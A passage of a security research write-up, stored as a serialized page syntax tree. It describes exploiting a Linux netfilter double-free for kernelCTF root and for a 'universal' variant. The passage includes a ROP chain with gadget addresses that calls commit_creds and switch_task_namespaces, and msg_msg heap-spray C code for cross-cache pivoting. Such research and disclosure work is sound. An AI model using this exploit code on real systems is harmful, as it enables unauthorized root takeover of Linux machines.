COMMIT_CREDS;\n",{"type":24,"tag":301,"props":63706,"children":63707},{"class":303,"line":415},[63708],{"type":24,"tag":301,"props":63709,"children":63710},{"emptyLinePlaceholder":16},[63711],{"type":30,"value":341},{"type":24,"tag":301,"props":63713,"children":63714},{"class":303,"line":439},[63715],{"type":24,"tag":301,"props":63716,"children":63717},{"style":1062},[63718],{"type":30,"value":63719}," // task = find_task_by_vpid(1);\n",{"type":24,"tag":301,"props":63721,"children":63722},{"class":303,"line":447},[63723,63727,63731,63735,63739,63743,63747,63751,63755,63759],{"type":24,"tag":301,"props":63724,"children":63725},{"style":369},[63726],{"type":30,"value":62889},{"type":24,"tag":301,"props":63728,"children":63729},{"style":359},[63730],{"type":30,"value":63404},{"type":24,"tag":301,"props":63732,"children":63733},{"style":385},[63734],{"type":30,"value":1859},{"type":24,"tag":301,"props":63736,"children":63737},{"style":359},[63738],{"type":30,"value":1046},{"type":24,"tag":301,"props":63740,"children":63741},{"style":385},[63742],{"type":30,"value":523},{"type":24,"tag":301,"props":63744,"children":63745},{"style":359},[63746],{"type":30,"value":62910},{"type":24,"tag":301,"props":63748,"children":63749},{"style":385},[63750],{"type":30,"value":11206},{"type":24,"tag":301,"props":63752,"children":63753},{"style":466},[63754],{"type":30,"value":63623},{"type":24,"tag":301,"props":63756,"children":63757},{"style":359},[63758],{"type":30,"value":1059},{"type":24,"tag":301,"props":63760,"children":63761},{"style":1062},[63762],{"type":30,"value":63632},{"type":24,"tag":301,"props":63764,"children":63765},{"class":303,"line":476},[63766,63770,63774,63778,63782,63786,63790],{"type":24,"tag":301,"props":63767,"children":63768},{"style":369},[63769],{"type":30,"value":62889},{"type":24,"tag":301,"props":63771,"children":63772},{"style":359},[63773],{"type":30,"value":63404},{"type":24,"tag":301,"props":63775,"children":63776},{"style":385},[63777],{"type":30,"value":1859},{"type":24,"tag":301,"props":63779,"children":63780},{"style":359},[63781],{"type":30,"value":1046},{"type":24,"tag":301,"props":63783,"children":63784},{"style":385},[63785],{"type":30,"value":523},{"type":24,"tag":301,"props":63787,"children":63788},{"style":466},[63789],{"type":30,"value":487},{"type":24,"tag":301,"props":63791,"children":63792},{"style":359},[63793],{"type":30,"value":492},{"type":24,"tag":301,"props":63795,"children":63796},{"class":303,"line":495},[63797,63801,63805,63809,63813,63817,63821,63825],{"type":24,"tag":301,"props":63798,"children":63799},{"style":369},[63800],{"type":30,"value":62889},{"type":24,"tag":301,"props":63802,"children":63803},{"style":359},[63804],{"type":30,"value":63404},{"type":24,"tag":301,"props":63806,"children":63807},{"style":385},[63808],{"type":30,"value":1859},{"type":24,"tag":301,"props":63810,"children":63811},{"style":359},[63812],{"type":30,"value":1046},{"type":24,"tag":301,"props":63814,"children":63815},{"style":385},[63816],{"type":30,"value":523},{"type":24,"tag":301,"props":63818,"children":63819},{"style":359},[63820],{"type":30,"value":62910},{"type":24,"tag":301,"props":63822,"children":63823},{"style":385},[63824],{"type":30,"value":11206},{"type":24,"tag":301,"props":63826,"children":63827},{"style":359},[63828],{"type":30,"value":63829}," FIND_TASK_BY_VPID;\n",{"type":24,"tag":301,"props":63831,"children":63832},{"class":303,"line":504},[63833,63837,63841,63845,63849,63853,63857,63861,63866,63870],{"type":24,"tag":301,"props":63834,"children":63835},{"style":369},[63836],{"type":30,"value":62889},{"type":24,"tag":301,"props":63838,"children":63839},{"style":359},[63840],{"type":30,"value":63404},{"type":24,"tag":301,"props":63842,"children":63843},{"style":385},[63844],{"type":30,"value":1859},{"type":24,"tag":301,"props":63846,"children":63847},{"style":359},[63848],{"type":30,"value":1046},{"type":24,"tag":301,"props":63850,"children":63851},{"style":385},[63852],{"type":30,"value":523},{"type":24,"tag":301,"props":63854,"children":63855},{"style":359},[63856],{"type":30,"value":62910},{"type":24,"tag":301,"props":63858,"children":63859},{"style":385},[63860],{"type":30,"value":11206},{"type":24,"tag":301,"props":63862,"children":63863},{"style":466},[63864],{"type":30,"value":63865}," 0xffffffff8102e2a6",{"type":24,"tag":301,"props":63867,"children":63868},{"style":359},[63869],{"type":30,"value":1059},{"type":24,"tag":301,"props":63871,"children":63872},{"style":1062},[63873],{"type":30,"value":63874}," // pop rsi; ret;\n",{"type":24,"tag":301,"props":63876,"children":63877},{"class":303,"line":512},[63878,63882,63886,63890,63894,63898,63903,63907,63912,63916,63921,63925],{"type":24,"tag":301,"props":63879,"children":63880},{"style":369},[63881],{"type":30,"value":62889},{"type":24,"tag":301,"props":63883,"children":63884},{"style":359},[63885],{"type":30,"value":63404},{"type":24,"tag":301,"props":63887,"children":63888},{"style":385},[63889],{"type":30,"value":1859},{"type":24,"tag":301,"props":63891,"children":63892},{"style":359},[63893],{"type":30,"value":1046},{"type":24,"tag":301,"props":63895,"children":63896},{"style":385},[63897],{"type":30,"value":523},{"type":24,"tag":301,"props":63899,"children":63900},{"style":359},[63901],{"type":30,"value":63902}," obj_ptr ",{"type":24,"tag":301,"props":63904,"children":63905},{"style":385},[63906],{"type":30,"value":11206},{"type":24,"tag":301,"props":63908,"children":63909},{"style":466},[63910],{"type":30,"value":63911}," 0xe0",{"type":24,"tag":301,"props":63913,"children":63914},{"style":385},[63915],{"type":30,"value":3407},{"type":24,"tag":301,"props":63917,"children":63918},{"style":466},[63919],{"type":30,"value":63920}," 0x66",{"type":24,"tag":301,"props":63922,"children":63923},{"style":359},[63924],{"type":30,"value":1059},{"type":24,"tag":301,"props":63926,"children":63927},{"style":1062},[63928],{"type":30,"value":63929}," // rax -> rdi and resume rop\n",{"type":24,"tag":301,"props":63931,"children":63932},{"class":303,"line":592},[63933,63937,63941,63945,63949,63953,63957,63961,63966,63970],{"type":24,"tag":301,"props":63934,"children":63935},{"style":369},[63936],{"type":30,"value":62889},{"type":24,"tag":301,"props":63938,"children":63939},{"style":359},[63940],{"type":30,"value":63404},{"type":24,"tag":301,"props":63942,"children":63943},{"style":385},[63944],{"type":30,"value":1859},{"type":24,"tag":301,"props":63946,"children":63947},{"style":359},[63948],{"type":30,"value":1046},{"type":24,"tag":301,"props":63950,"children":63951},{"style":385},[63952],{"type":30,"value":523},{"type":24,"tag":301,"props":63954,"children":63955},{"style":359},[63956],{"type":30,"value":62910},{"type":24,"tag":301,"props":63958,"children":63959},{"style":385},[63960],{"type":30,"value":11206},{"type":24,"tag":301,"props":63962,"children":63963},{"style":466},[63964],{"type":30,"value":63965}," 0xffffffff81caed31",{"type":24,"tag":301,"props":63967,"children":63968},{"style":359},[63969],{"type":30,"value":1059},{"type":24,"tag":301,"props":63971,"children":63972},{"style":1062},[63973],{"type":30,"value":63974}," // push rax; jmp qword ptr [rsi + 0x66];\n",{"type":24,"tag":301,"props":63976,"children":63977},{"class":303,"line":619},[63978],{"type":24,"tag":301,"props":63979,"children":63980},{"emptyLinePlaceholder":16},[63981],{"type":30,"value":341},{"type":24,"tag":301,"props":63983,"children":63984},{"class":303,"line":635},[63985],{"type":24,"tag":301,"props":63986,"children":63987},{"style":1062},[63988],{"type":30,"value":63989}," // switch_task_namespaces(task, &init_nsproxy);\n",{"type":24,"tag":301,"props":63991,"children":63992},{"class":303,"line":643},[63993,63997,64001,64005,64009,64013,64017,64021,64025,64029],{"type":24,"tag":301,"props":63994,"children":63995},{"style":369},[63996],{"type":30,"value":62889},{"type":24,"tag":301,"props":63998,"children":63999},{"style":359},[64000],{"type":30,"value":63404},{"type":24,"tag":301,"props":64002,"children":64003},{"style":385},[64004],{"type":30,"value":1859},{"type":24,"tag":301,"props":64006,"children":64007},{"style":359},[64008],{"type":30,"value":1046},{"type":24,"tag":301,"props":64010,"children":64011},{"style":385},[64012],{"type":30,"value":523},{"type":24,"tag":301,"props":64014,"children":64015},{"style":359},[64016],{"type":30,"value":62910},{"type":24,"tag":301,"props":64018,"children":64019},{"style":385},[64020],{"type":30,"value":11206},{"type":24,"tag":301,"props":64022,"children":64023},{"style":466},[64024],{"type":30,"value":63865},{"type":24,"tag":301,"props":64026,"children":64027},{"style":359},[64028],{"type":30,"value":1059},{"type":24,"tag":301,"props":64030,"children":64031},{"style":1062},[64032],{"type":30,"value":63874},{"type":24,"tag":301,"props":64034,"children":64035},{"class":303,"line":652},[64036,64040,64044,64048,64052,64056,64060,64064],{"type":24,"tag":301,"props":64037,"children":64038},{"style":369},[64039],{"type":30,"value":62889},{"type":24,"tag":301,"props":64041,"children":64042},{"style":359},[64043],{"type":30,"value":63404},{"type":24,"tag":301,"props":64045,"children":64046},{"style":385},[64047],{"type":30,"value":1859},{"type":24,"tag":301,"props":64049,"children":64050},{"style":359},[64051],{"type":30,"value":1046},{"type":24,"tag":301,"props":64053,"children":64054},{"style":385},[64055],{"type":30,"value":523},{"type":24,"tag":301,"props":64057,"children":64058},{"style":359},[64059],{"type":30,"value":62910},{"type":24,"tag":301,"props":64061,"children":64062},{"style":385},[64063],{"type":30,"value":11206},{"type":24,"tag":301,"props":64065,"children":64066},{"style":359},[64067],{"type":30,"value":64068}," INIT_NSPROXY;\n",{"type":24,"tag":301,"props":64070,"children":64071},{"class":303,"line":666},[64072,64076,64080,64084,64088,64092,64096,64100],{"type":24,"tag":301,"props":64073,"children":64074},{"style":369},[64075],{"type":30,"value":62889},{"type":24,"tag":301,"props":64077,"children":64078},{"style":359},[64079],{"type":30,"value":63404},{"type":24,"tag":301,"props":64081,"children":64082},{"style":385},[64083],{"type":30,"value":1859},{"type":24,"tag":301,"props":64085,"children":64086},{"style":359},[64087],{"type":30,"value":1046},{"type":24,"tag":301,"props":64089,"children":64090},{"style":385},[64091],{"type":30,"value":523},{"type":24,"tag":301,"props":64093,"children":64094},{"style":359},[64095],{"type":30,"value":62910},{"type":24,"tag":301,"props":64097,"children":64098},{"style":385},[64099],{"type":30,"value":11206},{"type":24,"tag":301,"props":64101,"children":64102},{"style":359},[64103],{"type":30,"value":64104}," SWITCH_TASK_NAMESPACES;\n",{"type":24,"tag":301,"props":64106,"children":64107},{"class":303,"line":674},[64108],{"type":24,"tag":301,"props":64109,"children":64110},{"style":359},[64111],{"type":30,"value":17123},{"type":24,"tag":80,"props":64113,"children":64115},{"id":64114},"grabbing-the-kernelctf-flag",[64116],{"type":30,"value":64117},"Grabbing the kernelCTF flag",{"type":24,"tag":32,"props":64119,"children":64120},{},[64121,64125,64127,64134],{"type":24,"tag":177,"props":64122,"children":64124},{"alt":179,"src":64123},"/posts/netfilter-universal-root-1-day/flag.png",[],{"type":30,"value":64126},"\nYou can find the kernelCTF exploit in our ",{"type":24,"tag":188,"props":64128,"children":64131},{"href":64129,"rel":64130},"https://github.com/otter-sec/OtterRoot/blob/master/kernelctf/exploit.c",[192],[64132],{"type":30,"value":64133},"GitHub",{"type":30,"value":206},{"type":24,"tag":43,"props":64136,"children":64138},{"id":64137},"universal-exploit",[64139],{"type":30,"value":64140},"Universal exploit",{"type":24,"tag":32,"props":64142,"children":64143},{},[64144],{"type":30,"value":64145},"After exploiting KernelCTF, I decided to use this vulnerability to craft a universal exploit (one that works stably regardless of the target without needing to be modified). I took a different approach to avoid some compatibility and reliability pitfalls, the biggest ones being ROP and anything else that relies on kernel data offsets because those change from build to build. It's not uncommon to compile a list of gadgets for the different builds but it makes more sense just to avoid the trouble entirely.",{"type":24,"tag":80,"props":64147,"children":64149},{"id":64148},"pivot-capability-using-msg_msg-mlistnext-pointer",[64150],{"type":30,"value":64151},"Pivot capability using msg_msg->mlist.next pointer",{"type":24,"tag":32,"props":64153,"children":64154},{},[64155,64157,64163,64165,64170,64172,64178],{"type":30,"value":64156},"Using the double-free vulnerability we can overlap a ",{"type":24,"tag":145,"props":64158,"children":64160},{"className":64159},[],[64161],{"type":30,"value":64162},"msg_msg",{"type":30,"value":64164}," object with with ",{"type":24,"tag":145,"props":64166,"children":64168},{"className":64167},[],[64169],{"type":30,"value":61821},{"type":30,"value":64171}," and control the ",{"type":24,"tag":145,"props":64173,"children":64175},{"className":64174},[],[64176],{"type":30,"value":64177},"m_list.next",{"type":30,"value":64179}," pointer.",{"type":24,"tag":291,"props":64181,"children":64183},{"className":35866,"code":64182,"language":35868,"meta":7,"style":7},"/* one msg_msg structure for each message */\nstruct msg_msg {\n struct list_head m_list;\n long m_type;\n size_t m_ts; /* message text size */\n struct msg_msgseg *next;\n void *security;\n /* the actual message follows immediately */\n};\n[...]\nstruct list_head {\n struct list_head *next, *prev;\n};\n",[64184],{"type":24,"tag":145,"props":64185,"children":64186},{"__ignoreMap":7},[64187,64195,64211,64232,64245,64263,64288,64304,64312,64319,64326,64334,64366],{"type":24,"tag":301,"props":64188,"children":64189},{"class":303,"line":304},[64190],{"type":24,"tag":301,"props":64191,"children":64192},{"style":1062},[64193],{"type":30,"value":64194},"/* one msg_msg structure for each message */\n",{"type":24,"tag":301,"props":64196,"children":64197},{"class":303,"line":320},[64198,64202,64207],{"type":24,"tag":301,"props":64199,"children":64200},{"style":348},[64201],{"type":30,"value":3010},{"type":24,"tag":301,"props":64203,"children":64204},{"style":10246},[64205],{"type":30,"value":64206}," msg_msg",{"type":24,"tag":301,"props":64208,"children":64209},{"style":359},[64210],{"type":30,"value":3035},{"type":24,"tag":301,"props":64212,"children":64213},{"class":303,"line":335},[64214,64218,64223,64228],{"type":24,"tag":301,"props":64215,"children":64216},{"style":348},[64217],{"type":30,"value":27920},{"type":24,"tag":301,"props":64219,"children":64220},{"style":10246},[64221],{"type":30,"value":64222}," list_head",{"type":24,"tag":301,"props":64224,"children":64225},{"style":369},[64226],{"type":30,"value":64227}," m_list",{"type":24,"tag":301,"props":64229,"children":64230},{"style":359},[64231],{"type":30,"value":492},{"type":24,"tag":301,"props":64233,"children":64234},{"class":303,"line":344},[64235,64240],{"type":24,"tag":301,"props":64236,"children":64237},{"style":348},[64238],{"type":30,"value":64239}," long",{"type":24,"tag":301,"props":64241,"children":64242},{"style":359},[64243],{"type":30,"value":64244}," m_type;\n",{"type":24,"tag":301,"props":64246,"children":64247},{"class":303,"line":401},[64248,64253,64258],{"type":24,"tag":301,"props":64249,"children":64250},{"style":348},[64251],{"type":30,"value":64252}," size_t",{"type":24,"tag":301,"props":64254,"children":64255},{"style":359},[64256],{"type":30,"value":64257}," m_ts;",{"type":24,"tag":301,"props":64259,"children":64260},{"style":1062},[64261],{"type":30,"value":64262}," /* message text size */\n",{"type":24,"tag":301,"props":64264,"children":64265},{"class":303,"line":415},[64266,64270,64275,64279,64284],{"type":24,"tag":301,"props":64267,"children":64268},{"style":348},[64269],{"type":30,"value":27920},{"type":24,"tag":301,"props":64271,"children":64272},{"style":10246},[64273],{"type":30,"value":64274}," msg_msgseg",{"type":24,"tag":301,"props":64276,"children":64277},{"style":348},[64278],{"type":30,"value":431},{"type":24,"tag":301,"props":64280,"children":64281},{"style":369},[64282],{"type":30,"value":64283},"next",{"type":24,"tag":301,"props":64285,"children":64286},{"style":359},[64287],{"type":30,"value":492},{"type":24,"tag":301,"props":64289,"children":64290},{"class":303,"line":439},[64291,64295,64299],{"type":24,"tag":301,"props":64292,"children":64293},{"style":348},[64294],{"type":30,"value":757},{"type":24,"tag":301,"props":64296,"children":64297},{"style":385},[64298],{"type":30,"value":431},{"type":24,"tag":301,"props":64300,"children":64301},{"style":359},[64302],{"type":30,"value":64303},"security;\n",{"type":24,"tag":301,"props":64305,"children":64306},{"class":303,"line":447},[64307],{"type":24,"tag":301,"props":64308,"children":64309},{"style":1062},[64310],{"type":30,"value":64311}," /* the actual message follows immediately */\n",{"type":24,"tag":301,"props":64313,"children":64314},{"class":303,"line":476},[64315],{"type":24,"tag":301,"props":64316,"children":64317},{"style":359},[64318],{"type":30,"value":3118},{"type":24,"tag":301,"props":64320,"children":64321},{"class":303,"line":495},[64322],{"type":24,"tag":301,"props":64323,"children":64324},{"style":359},[64325],{"type":30,"value":17123},{"type":24,"tag":301,"props":64327,"children":64328},{"class":303,"line":504},[64329],{"type":24,"tag":301,"props":64330,"children":64331},{"style":359},[64332],{"type":30,"value":64333},"struct list_head {\n",{"type":24,"tag":301,"props":64335,"children":64336},{"class":303,"line":512},[64337,64341,64345,64349,64353,64357,64361],{"type":24,"tag":301,"props":64338,"children":64339},{"style":348},[64340],{"type":30,"value":27920},{"type":24,"tag":301,"props":64342,"children":64343},{"style":10246},[64344],{"type":30,"value":64222},{"type":24,"tag":301,"props":64346,"children":64347},{"style":348},[64348],{"type":30,"value":431},{"type":24,"tag":301,"props":64350,"children":64351},{"style":369},[64352],{"type":30,"value":64283},{"type":24,"tag":301,"props":64354,"children":64355},{"style":359},[64356],{"type":30,"value":377},{"type":24,"tag":301,"props":64358,"children":64359},{"style":385},[64360],{"type":30,"value":772},{"type":24,"tag":301,"props":64362,"children":64363},{"style":359},[64364],{"type":30,"value":64365},"prev;\n",{"type":24,"tag":301,"props":64367,"children":64368},{"class":303,"line":592},[64369],{"type":24,"tag":301,"props":64370,"children":64371},{"style":359},[64372],{"type":30,"value":3118},{"type":24,"tag":32,"props":64374,"children":64375},{},[64376,64378,64384,64386,64391],{"type":30,"value":64377},"This is particularly interesting if we send messages of different sizes on the same queue, making the ",{"type":24,"tag":145,"props":64379,"children":64381},{"className":64380},[],[64382],{"type":30,"value":64383},"mlist.next",{"type":30,"value":64385}," pointer of a message that lives in one cache point into a different cache. So, by spraying ",{"type":24,"tag":145,"props":64387,"children":64389},{"className":64388},[],[64390],{"type":30,"value":64162},{"type":30,"value":64392}," in kmalloc-cg-256 with a secondary message in each queue living in kmalloc-cg-1k.",{"type":24,"tag":32,"props":64394,"children":64395},{},[64396,64398,64403,64405],{"type":30,"value":64397},"By incrementing the next pointer of our controllable ",{"type":24,"tag":145,"props":64399,"children":64401},{"className":64400},[],[64402],{"type":30,"value":64162},{"type":30,"value":64404}," by 256, we are able to make it point to the different secondary message that is already referenced by a different primary message, creating a duplicated reference. We allow an easy way of pivoting our double-free capabilities to other caches and attacking a greater variety of objects.\n",{"type":24,"tag":177,"props":64406,"children":64408},{"alt":179,"src":64407},"/posts/netfilter-universal-root-1-day/msg-msg.png",[],{"type":24,"tag":291,"props":64410,"children":64412},{"className":35866,"code":64411,"language":35868,"meta":7,"style":7},"[...]\n // Spray msg_msg in kmalloc-256 and kmalloc-1k\n msg_t *msg = calloc(1, sizeof(msg_t) + 0xe8 - 48);\n int qid[SPRAY];\n for (int i = 0; i \u003C SPRAY; i++)\n {\n qid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);\n if (qid[i] \u003C 0)\n {\n perror(\"[-] msgget\");\n }\n *(uint32_t *)msg->mtext = i;\n *(uint64_t *)&msg->mtext[8] = 0xdeadbeefcafebabe;\n msg->mtype = MTYPE_PRIMARY;\n msgsnd(qid[i], msg, 0xe8 - 48, 0);\n msg->mtype = MTYPE_SECONDARY;\n msgsnd(qid[i], msg, 1024 - 48, 0);\n }\n // Prepare evil msg\n int evilqid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);\n if (evilqid \u003C 0)\n {\n perror(\"[-] msgget\");\n }\n[...] // trigger double-free in kmalloc-256\n",[64413],{"type":24,"tag":145,"props":64414,"children":64415},{"__ignoreMap":7},[64416,64423,64431,64457,64474,64522,64529,64569,64601,64608,64629,64636,64681,64745,64771,64817,64841,64884,64891,64899,64935,64959,64966,64986,64993],{"type":24,"tag":301,"props":64417,"children":64418},{"class":303,"line":304},[64419],{"type":24,"tag":301,"props":64420,"children":64421},{"style":359},[64422],{"type":30,"value":17123},{"type":24,"tag":301,"props":64424,"children":64425},{"class":303,"line":320},[64426],{"type":24,"tag":301,"props":64427,"children":64428},{"style":359},[64429],{"type":30,"value":64430}," // Spray msg_msg in kmalloc-256 and kmalloc-1k\n",{"type":24,"tag":301,"props":64432,"children":64433},{"class":303,"line":335},[64434,64439,64443,64447,64452],{"type":24,"tag":301,"props":64435,"children":64436},{"style":359},[64437],{"type":30,"value":64438}," msg_t *msg = calloc(1, ",{"type":24,"tag":301,"props":64440,"children":64441},{"style":10246},[64442],{"type":30,"value":62050},{"type":24,"tag":301,"props":64444,"children":64445},{"style":359},[64446],{"type":30,"value":362},{"type":24,"tag":301,"props":64448,"children":64449},{"style":10246},[64450],{"type":30,"value":64451},"msg_t",{"type":24,"tag":301,"props":64453,"children":64454},{"style":359},[64455],{"type":30,"value":64456},") + 0xe8 - 48);\n",{"type":24,"tag":301,"props":64458,"children":64459},{"class":303,"line":344},[64460,64464,64469],{"type":24,"tag":301,"props":64461,"children":64462},{"style":348},[64463],{"type":30,"value":407},{"type":24,"tag":301,"props":64465,"children":64466},{"style":369},[64467],{"type":30,"value":64468}," qid",{"type":24,"tag":301,"props":64470,"children":64471},{"style":359},[64472],{"type":30,"value":64473},"[SPRAY];\n",{"type":24,"tag":301,"props":64475,"children":64476},{"class":303,"line":401},[64477,64481,64485,64489,64493,64497,64501,64505,64509,64514,64518],{"type":24,"tag":301,"props":64478,"children":64479},{"style":308},[64480],{"type":30,"value":3249},{"type":24,"tag":301,"props":64482,"children":64483},{"style":359},[64484],{"type":30,"value":873},{"type":24,"tag":301,"props":64486,"children":64487},{"style":348},[64488],{"type":30,"value":351},{"type":24,"tag":301,"props":64490,"children":64491},{"style":359},[64492],{"type":30,"value":1998},{"type":24,"tag":301,"props":64494,"children":64495},{"style":385},[64496],{"type":30,"value":523},{"type":24,"tag":301,"props":64498,"children":64499},{"style":466},[64500],{"type":30,"value":685},{"type":24,"tag":301,"props":64502,"children":64503},{"style":359},[64504],{"type":30,"value":1844},{"type":24,"tag":301,"props":64506,"children":64507},{"style":385},[64508],{"type":30,"value":1849},{"type":24,"tag":301,"props":64510,"children":64511},{"style":359},[64512],{"type":30,"value":64513}," SPRAY; i",{"type":24,"tag":301,"props":64515,"children":64516},{"style":385},[64517],{"type":30,"value":1859},{"type":24,"tag":301,"props":64519,"children":64520},{"style":359},[64521],{"type":30,"value":791},{"type":24,"tag":301,"props":64523,"children":64524},{"class":303,"line":415},[64525],{"type":24,"tag":301,"props":64526,"children":64527},{"style":359},[64528],{"type":30,"value":35943},{"type":24,"tag":301,"props":64530,"children":64531},{"class":303,"line":439},[64532,64537,64541,64545,64550,64555,64560,64564],{"type":24,"tag":301,"props":64533,"children":64534},{"style":369},[64535],{"type":30,"value":64536}," qid",{"type":24,"tag":301,"props":64538,"children":64539},{"style":359},[64540],{"type":30,"value":61318},{"type":24,"tag":301,"props":64542,"children":64543},{"style":385},[64544],{"type":30,"value":523},{"type":24,"tag":301,"props":64546,"children":64547},{"style":314},[64548],{"type":30,"value":64549}," msgget",{"type":24,"tag":301,"props":64551,"children":64552},{"style":359},[64553],{"type":30,"value":64554},"(IPC_PRIVATE, ",{"type":24,"tag":301,"props":64556,"children":64557},{"style":466},[64558],{"type":30,"value":64559},"0666",{"type":24,"tag":301,"props":64561,"children":64562},{"style":385},[64563],{"type":30,"value":11095},{"type":24,"tag":301,"props":64565,"children":64566},{"style":359},[64567],{"type":30,"value":64568}," IPC_CREAT);\n",{"type":24,"tag":301,"props":64570,"children":64571},{"class":303,"line":447},[64572,64576,64580,64585,64589,64593,64597],{"type":24,"tag":301,"props":64573,"children":64574},{"style":308},[64575],{"type":30,"value":3285},{"type":24,"tag":301,"props":64577,"children":64578},{"style":359},[64579],{"type":30,"value":873},{"type":24,"tag":301,"props":64581,"children":64582},{"style":369},[64583],{"type":30,"value":64584},"qid",{"type":24,"tag":301,"props":64586,"children":64587},{"style":359},[64588],{"type":30,"value":61318},{"type":24,"tag":301,"props":64590,"children":64591},{"style":385},[64592],{"type":30,"value":1849},{"type":24,"tag":301,"props":64594,"children":64595},{"style":466},[64596],{"type":30,"value":685},{"type":24,"tag":301,"props":64598,"children":64599},{"style":359},[64600],{"type":30,"value":791},{"type":24,"tag":301,"props":64602,"children":64603},{"class":303,"line":476},[64604],{"type":24,"tag":301,"props":64605,"children":64606},{"style":359},[64607],{"type":30,"value":38411},{"type":24,"tag":301,"props":64609,"children":64610},{"class":303,"line":495},[64611,64616,64620,64625],{"type":24,"tag":301,"props":64612,"children":64613},{"style":314},[64614],{"type":30,"value":64615}," perror",{"type":24,"tag":301,"props":64617,"children":64618},{"style":359},[64619],{"type":30,"value":362},{"type":24,"tag":301,"props":64621,"children":64622},{"style":329},[64623],{"type":30,"value":64624},"\"[-] msgget\"",{"type":24,"tag":301,"props":64626,"children":64627},{"style":359},[64628],{"type":30,"value":589},{"type":24,"tag":301,"props":64630,"children":64631},{"class":303,"line":504},[64632],{"type":24,"tag":301,"props":64633,"children":64634},{"style":359},[64635],{"type":30,"value":3345},{"type":24,"tag":301,"props":64637,"children":64638},{"class":303,"line":512},[64639,64643,64647,64651,64655,64659,64664,64668,64673,64677],{"type":24,"tag":301,"props":64640,"children":64641},{"style":385},[64642],{"type":30,"value":14567},{"type":24,"tag":301,"props":64644,"children":64645},{"style":359},[64646],{"type":30,"value":362},{"type":24,"tag":301,"props":64648,"children":64649},{"style":348},[64650],{"type":30,"value":7041},{"type":24,"tag":301,"props":64652,"children":64653},{"style":385},[64654],{"type":30,"value":431},{"type":24,"tag":301,"props":64656,"children":64657},{"style":359},[64658],{"type":30,"value":9961},{"type":24,"tag":301,"props":64660,"children":64661},{"style":369},[64662],{"type":30,"value":64663},"msg",{"type":24,"tag":301,"props":64665,"children":64666},{"style":359},[64667],{"type":30,"value":882},{"type":24,"tag":301,"props":64669,"children":64670},{"style":369},[64671],{"type":30,"value":64672},"mtext",{"type":24,"tag":301,"props":64674,"children":64675},{"style":385},[64676],{"type":30,"value":2537},{"type":24,"tag":301,"props":64678,"children":64679},{"style":359},[64680],{"type":30,"value":1818},{"type":24,"tag":301,"props":64682,"children":64683},{"class":303,"line":592},[64684,64688,64692,64696,64700,64704,64708,64712,64716,64720,64724,64728,64732,64736,64741],{"type":24,"tag":301,"props":64685,"children":64686},{"style":385},[64687],{"type":30,"value":14567},{"type":24,"tag":301,"props":64689,"children":64690},{"style":359},[64691],{"type":30,"value":362},{"type":24,"tag":301,"props":64693,"children":64694},{"style":348},[64695],{"type":30,"value":6020},{"type":24,"tag":301,"props":64697,"children":64698},{"style":385},[64699],{"type":30,"value":431},{"type":24,"tag":301,"props":64701,"children":64702},{"style":359},[64703],{"type":30,"value":9961},{"type":24,"tag":301,"props":64705,"children":64706},{"style":385},[64707],{"type":30,"value":556},{"type":24,"tag":301,"props":64709,"children":64710},{"style":369},[64711],{"type":30,"value":64663},{"type":24,"tag":301,"props":64713,"children":64714},{"style":359},[64715],{"type":30,"value":882},{"type":24,"tag":301,"props":64717,"children":64718},{"style":369},[64719],{"type":30,"value":64672},{"type":24,"tag":301,"props":64721,"children":64722},{"style":359},[64723],{"type":30,"value":541},{"type":24,"tag":301,"props":64725,"children":64726},{"style":466},[64727],{"type":30,"value":10900},{"type":24,"tag":301,"props":64729,"children":64730},{"style":359},[64731],{"type":30,"value":1046},{"type":24,"tag":301,"props":64733,"children":64734},{"style":385},[64735],{"type":30,"value":523},{"type":24,"tag":301,"props":64737,"children":64738},{"style":466},[64739],{"type":30,"value":64740}," 0xdeadbeefcafebabe",{"type":24,"tag":301,"props":64742,"children":64743},{"style":359},[64744],{"type":30,"value":492},{"type":24,"tag":301,"props":64746,"children":64747},{"class":303,"line":619},[64748,64753,64757,64762,64766],{"type":24,"tag":301,"props":64749,"children":64750},{"style":369},[64751],{"type":30,"value":64752}," msg",{"type":24,"tag":301,"props":64754,"children":64755},{"style":359},[64756],{"type":30,"value":882},{"type":24,"tag":301,"props":64758,"children":64759},{"style":369},[64760],{"type":30,"value":64761},"mtype",{"type":24,"tag":301,"props":64763,"children":64764},{"style":385},[64765],{"type":30,"value":2537},{"type":24,"tag":301,"props":64767,"children":64768},{"style":359},[64769],{"type":30,"value":64770}," MTYPE_PRIMARY;\n",{"type":24,"tag":301,"props":64772,"children":64773},{"class":303,"line":635},[64774,64779,64783,64787,64792,64796,64800,64805,64809,64813],{"type":24,"tag":301,"props":64775,"children":64776},{"style":314},[64777],{"type":30,"value":64778}," msgsnd",{"type":24,"tag":301,"props":64780,"children":64781},{"style":359},[64782],{"type":30,"value":362},{"type":24,"tag":301,"props":64784,"children":64785},{"style":369},[64786],{"type":30,"value":64584},{"type":24,"tag":301,"props":64788,"children":64789},{"style":359},[64790],{"type":30,"value":64791},"[i], msg, ",{"type":24,"tag":301,"props":64793,"children":64794},{"style":466},[64795],{"type":30,"value":62691},{"type":24,"tag":301,"props":64797,"children":64798},{"style":385},[64799],{"type":30,"value":3407},{"type":24,"tag":301,"props":64801,"children":64802},{"style":466},[64803],{"type":30,"value":64804}," 48",{"type":24,"tag":301,"props":64806,"children":64807},{"style":359},[64808],{"type":30,"value":377},{"type":24,"tag":301,"props":64810,"children":64811},{"style":466},[64812],{"type":30,"value":584},{"type":24,"tag":301,"props":64814,"children":64815},{"style":359},[64816],{"type":30,"value":589},{"type":24,"tag":301,"props":64818,"children":64819},{"class":303,"line":643},[64820,64824,64828,64832,64836],{"type":24,"tag":301,"props":64821,"children":64822},{"style":369},[64823],{"type":30,"value":64752},{"type":24,"tag":301,"props":64825,"children":64826},{"style":359},[64827],{"type":30,"value":882},{"type":24,"tag":301,"props":64829,"children":64830},{"style":369},[64831],{"type":30,"value":64761},{"type":24,"tag":301,"props":64833,"children":64834},{"style":385},[64835],{"type":30,"value":2537},{"type":24,"tag":301,"props":64837,"children":64838},{"style":359},[64839],{"type":30,"value":64840}," 